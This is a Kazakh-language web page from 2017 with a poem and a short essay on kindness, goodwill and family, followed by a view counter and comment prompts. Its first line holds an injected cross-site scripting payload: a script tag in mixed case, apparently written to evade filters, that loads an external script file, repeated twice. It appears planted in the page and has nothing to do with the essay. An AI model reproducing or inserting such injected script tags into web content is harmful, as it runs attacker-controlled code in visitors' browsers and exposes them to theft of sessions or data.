<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.04.2017

«Жақсылықтың бір бөлшегі»

Жақынды, досты, аяла,

Қанатың сонда талмайды.

Барыңды жұрттан аяма

Жақсылық жерде қалмайды.

Жайдары жүзбен жарқыра,

Қатыгез болсаң сол қайғы.

Қайырымды бол халқыңа

Жақсылық жерде қалмайды.

Адамзат баласының өзіне және өзгелерге жасаған жақсылығынан кейінгі ұрпқа өнеге-үлгі, ғибрат алады. Қоршаған ортаға, айналаңдағы адамдарға мейірімділікпен қарап, қолыңнан келгенше көмек көрсете алу адамшылықтың белгісі. Жүзінде нұр ойнаған, пейілі кең, жылы жүректі адам әрқашан жақсылыққа жол таба біледі. Кешірімділік, сыпайылық, сезімталдық жақсы адамға ғана жолдас болады. Ізеттілік пен инабаттылық та жақсы адамға тән қасиет. Жақсы ниетпен айтылған бір ауыз сөз жүрегіңді тебірентіп, жаныңды жадыратады. «Жақсының жақсылығын айт, нұры тасысын» деген даналық сөздің мәні де осында. Жасампаздық жарасымы да осындай ізгі істерден туындайды.

Адам өмірі жақсылық нұрын сезіп, ғибратты ғұмыр кешуге бағытталады. Әр адамның өмірлік мақсат-тілегі болады. Аңсаған арманына, көздеген мақсатына қол жеткізу жолында адамдар ізгілік пен адалдықты, ізденіс пен еңбекқорлықты арқау етеді.

«Отбасында адам бойындағы асыл қасиеттер жарқырай көрініп,қалыптасады. Отанға деген ыстық сезім-жақындарына,туған-туысқандарына деген сүйіспеншіліктен »- деп елбасы айтқандай әрбіреуіміздің жүрегімізде отбасына деген жылу,сезім орнаса,біздің болашағымыз жарқын болады. Әрқайсымыздың отбасымыз берекелі болсын

Просмотров: 526


Пікір қосу



Деректерді қолтаңбаға қосу